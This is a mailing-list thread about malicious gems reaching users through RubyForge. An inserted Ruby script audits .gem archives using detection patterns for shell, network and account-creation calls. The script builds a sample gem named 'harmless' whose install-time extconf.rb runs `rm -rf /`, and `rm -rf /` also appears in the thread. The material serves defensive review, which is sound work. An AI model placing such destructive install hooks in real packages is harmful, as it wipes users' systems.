Heh, I didn't say I was going to do it. I was thinking
what happened with ruby-lang.org being hacked. What
really stops someone from violently attacking more
than just one computer?
Finding their identity is irrelevant.
For Example:
Joe PeelHacker decides he wants to screw over the ruby
community. So, he gets a handful of http proxies, and
uses a proxy chain to anonymously create a new
project, create files, and create a gem.
Okay, right now he has accomplished pretty much
everything he needs to do to start attacking. He
releases a gem. It gets copied over without being
looked at by a QA team. Ok, fine.
Assuming the person is installing the RubyGem on
*nix (includes MacOSX as well, it's Darwin based) via
root, or running it on Microsoft Windows. The gem
contains 3 programs, a script, a nix version script
that creates a user and alerts the attacker via irc,
and there is a windows trojan that the attacker
created that is also a worm. Okay, the trojan is new,
so Antivirus programs will not detect it. AV programs
perform by the database engine of known viruses.
Norton Bloodhound doesn't pick it up either.
Okay, this attacker just screwed over not only one
server, but the whole community of Rubyland.
Is this pretty clear now? This scenario would work
perfectly. There is nothing to stop someone from
attacking. It's an open security problem.
-------------------------------------------
David Ross
Phone: 865.539.3798
Email: (e-mail address removed)
-------------------------------------------
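The scenario above (a gem whose install-time script runs a destructive command or phones home) and Rich's question below about who reads every line of every library both come down to inspecting a gem before it is installed. The following script is an added example, not code from this thread or from the RubyForge/RubyGems project: it uses RubyGems' real Gem::Package API to read a .gem archive without installing it, verifies the archive checksums, and reports the things a reviewer would want to look at first: native extensions (extconf.rb runs arbitrary Ruby at install time), declared executables, and lines matching a small heuristic pattern list. The sample gem it builds is constructed for the demo, and the pattern list is an assumption of this example, a set of review hints rather than a definition of "malicious".

```ruby
# Added example (not from the thread): audit a .gem archive before installing it.
require 'rubygems'
require 'rubygems/package'
require 'rubygems/user_interaction'
require 'tmpdir'
require 'fileutils'

# Heuristic review hints (an assumption of this example, not a RubyGems feature).
# A match means "a human should read this line", not "this gem is malicious".
SUSPICIOUS = {
  'shell command'     => /\b(system|exec|spawn|popen)\s*[\(\s]|`[^`]+`|%x[\(\{\[]/,
  'destructive rm'    => /\brm\s+-\w*r\w*\s+\/(?=[\s"'`;)]|$)/,
  'network/irc'       => /\b(TCPSocket|Net::HTTP|Socket)\b|irc:\/\//,
  'account creation'  => /\b(useradd|adduser|net user)\b/,
}.freeze

# Read the archive with Gem::Package: nothing from the gem is executed.
# Returns a hash with the gem's full name, its file list and review findings.
def audit_gem(gem_path)
  pkg = Gem::Package.new(gem_path)
  pkg.verify                       # checksums inside the archive must match its contents
  spec = pkg.spec
  findings = []
  unless spec.extensions.empty?
    findings << "native extension(s) run code at install time: #{spec.extensions.join(', ')}"
  end
  unless spec.executables.empty?
    findings << "declares executables: #{spec.executables.join(', ')}"
  end
  Dir.mktmpdir('gem-audit') do |dir|
    pkg.extract_files(dir)         # unpack data.tar.gz into a scratch directory only
    pkg.contents.each do |rel|
      path = File.join(dir, rel)
      next unless File.file?(path)
      File.open(path, 'rb') do |f| # binary read so odd bytes never raise on =~
        f.each_line.with_index(1) do |line, no|
          SUSPICIOUS.each do |label, re|
            findings << "#{rel}:#{no}: #{label}: #{line.strip}" if line =~ re
          end
        end
      end
    end
  end
  { name: spec.full_name, files: pkg.contents, findings: findings }
end

# Constructed sample gem: a harmless lib/ file plus an extconf.rb that hides
# the destructive command from the thread. Built with RubyGems' own packager.
def build_sample_gem(dir)
  FileUtils.mkdir_p(File.join(dir, 'lib'))
  FileUtils.mkdir_p(File.join(dir, 'ext'))
  File.write(File.join(dir, 'lib', 'harmless.rb'),
             "module Harmless; VERSION = '0.0.1'; end\n")
  File.write(File.join(dir, 'ext', 'extconf.rb'),
             "require 'mkmf'\nsystem(\"rm -rf /\") # runs at `gem install` time\ncreate_makefile('harmless')\n")
  spec = Gem::Specification.new do |s|
    s.name = 'harmless'
    s.version = '0.0.1'
    s.summary = 'constructed sample for the audit example'
    s.authors = ['example']
    s.files = ['lib/harmless.rb', 'ext/extconf.rb']
    s.extensions = ['ext/extconf.rb']
  end
  Dir.chdir(dir) do                # Gem::Package.build reads spec.files relative to cwd
    Gem::DefaultUserInteraction.use_ui(Gem::SilentUI.new) do
      Gem::Package.build(spec, true) # skip_validation: the demo spec is deliberately minimal
    end
  end
  File.join(dir, spec.file_name)
end

if __FILE__ == $0
  Dir.mktmpdir('gem-audit-demo') do |dir|
    report = audit_gem(build_sample_gem(dir))
    puts "gem:   #{report[:name]}"
    puts "files: #{report[:files].join(', ')}"
    puts 'findings:'
    report[:findings].each { |f| puts "  - #{f}" }
  end
end
```

To apply this to a real gem, run `gem fetch NAME` (which downloads the .gem without installing it) and pass the resulting file to `audit_gem`. The reviewer's attention goes first to anything under `ext/`, since extconf.rb runs during installation regardless of whether the library is ever required, and then to the flagged lines; the pattern list is deliberately short and should be extended to match whatever the reviewing team decides is worth reading.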
--- Richard Kilmer said:
Should we remove your rubyforge account now?
If someone does that, it's traced to their project,
and their identity. What
stops someone from putting `rm -rf /` in ANY ruby
library? Have you read
every line of every ruby library and c extension in
ruby to verify that
those commands are not present? Does a packager
check every line of C code
in a native extension to make sure that those lines
are not present? There
is a point where trust is assumed...the question is
at what point. Not
saying that QA is bad, just that autonomy is not bad
either...it scales
really well.
-rich
Here's food for thought..
What stops someone who has a registered project on
RubyForge from abusing Gems? A constructive criticism of a
major design flaw. This is why a central repository
where there is a QA team is good. They can look at
code.
`rm -rf /`
---------------------------
David Ross
Phone: 865.539.3798
Email: drossruby [at] yahoo.com
---------------------------
Richard Kilmer wrote:
Release the file like you would any file (in the
Files tab). RubyForge
picks them up and puts them in the repo, and they
are (within an hour for
now) available for remote download.
Excellent! Thanks.
James
-rich
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail